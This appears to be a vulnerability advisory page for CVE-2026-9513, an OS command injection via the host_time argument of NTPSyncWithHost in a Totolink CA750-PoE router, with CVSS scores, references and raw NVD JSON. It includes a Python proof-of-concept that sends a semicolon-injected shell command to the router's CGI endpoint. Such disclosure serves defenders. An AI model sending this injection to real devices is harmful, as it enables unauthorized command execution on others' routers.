CVE-2026-9513

Description

A weakness has been identified in Totolink CA750-PoE 6.2c.510. This issue affects the function NTPSyncWithHost of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. Executing a manipulation of the argument host_time can lead to os command injection. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Totolink CA750-PoE 6.2c.510

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (replace with actual IP)
target_url = "http://192.168.1.1/cgi-bin/cstecgi.cgi"

# Construct the payload to inject OS command
# Example: Reverse shell or simple command execution
# Using ';' to separate commands
injection_payload = "; echo 'CVE-2026-9513_test' > /tmp/poc.txt"

# Data required for the vulnerable function
post_data = {
    "action": "NTPSyncWithHost",
    "host_time": injection_payload
}

try:
    # Sending the malicious request
    response = requests.post(target_url, data=post_data)
    print(f"Status Code: {response.status_code}")
    print(f"Response Body: {response.text}")
except requests.exceptions.RequestException as e:
    print(f"Request failed: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-9513
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-9513
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-9513/
[4] VulDB https://vuldb.com/cve/CVE-2026-9513
[5] https://github.com/wudipjq/my_vuln/blob/main/totolink4/vuln_51/51.md
[6] https://vuldb.com/submit/813924
[7] https://vuldb.com/vuln/365513
[8] https://vuldb.com/vuln/365513/cti
[9] https://www.totolink.net/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-9513", "sourceIdentifier": "[email protected]", "published": "2026-05-25T23:16:34.233", "lastModified": "2026-05-25T23:16:34.233", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in Totolink CA750-PoE 6.2c.510. This issue affects the function NTPSyncWithHost of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. Executing a manipulation of the argument host_time can lead to os command injection. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}, {"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://github.com/wudipjq/my_vuln/blob/main/totolink4/vuln_51/51.md", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/813924", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/365513", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/365513/cti", "source": "[email protected]"}, {"url": "https://www.totolink.net/", "source": "[email protected]"}]}}